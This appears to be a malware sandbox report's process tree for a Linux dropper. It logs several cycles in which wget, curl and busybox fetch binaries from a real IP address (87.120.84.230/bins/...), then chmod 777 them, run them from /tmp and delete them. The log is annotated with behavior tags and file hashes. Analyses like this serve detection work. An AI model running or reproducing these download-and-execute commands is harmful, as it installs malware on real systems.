/usr/bin/wgetwget http://87.120.84.230/bins/SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ82⤵PID:932
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ82⤵
- Reads runtime system information
- Writes file to tmp directory
PID:933
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ82⤵PID:934
-
-
/bin/chmodchmod 777 SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ82⤵
- File and Directory Permissions Modification
PID:935
-
-
/tmp/SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ8./SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ82⤵
- Executes dropped EXE
PID:936
-
-
/bin/rmrm SzsXabqeIZ2BtUxxHhZOhZOMFsurjljyQ82⤵PID:937
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR2⤵PID:938
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:939
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR2⤵PID:940
-
-
/bin/chmodchmod 777 j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR2⤵
- File and Directory Permissions Modification
PID:941
-
-
/tmp/j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR./j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR2⤵
- Executes dropped EXE
PID:942
-
-
/bin/rmrm j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR2⤵PID:943
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX2⤵PID:944
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:945
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX2⤵PID:946
-
-
/bin/chmodchmod 777 nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX2⤵
- File and Directory Permissions Modification
PID:950
-
-
/tmp/nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX./nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX2⤵
- Executes dropped EXE
PID:951
-
-
/bin/rmrm nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX2⤵PID:952
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC62⤵PID:953
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:954
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC62⤵PID:955
-
-
/bin/chmodchmod 777 UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC62⤵
- File and Directory Permissions Modification
PID:956
-
-
/tmp/UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC6./UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC62⤵
- Executes dropped EXE
PID:957
-
-
/bin/rmrm UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC62⤵PID:958
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx2⤵PID:959
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:960
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx2⤵PID:961
-
-
/bin/chmodchmod 777 vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx2⤵
- File and Directory Permissions Modification
PID:962
-
-
/tmp/vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx./vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx2⤵
- Executes dropped EXE
PID:963
-
-
/bin/rmrm vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx2⤵PID:964
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm2⤵PID:965
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:966
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm2⤵PID:967
-
-
/bin/chmodchmod 777 DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm2⤵
- File and Directory Permissions Modification
PID:968
-
-
/tmp/DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm./DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm2⤵
- Executes dropped EXE
PID:969
-
-
/bin/rmrm DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm2⤵PID:970
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd2⤵PID:971
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:972
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd2⤵PID:973
-
-
/bin/chmodchmod 777 aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd2⤵
- File and Directory Permissions Modification
PID:974
-
-
/tmp/aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd./aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd2⤵
- Executes dropped EXE
PID:975
-
-
/bin/rmrm aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd2⤵PID:976
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97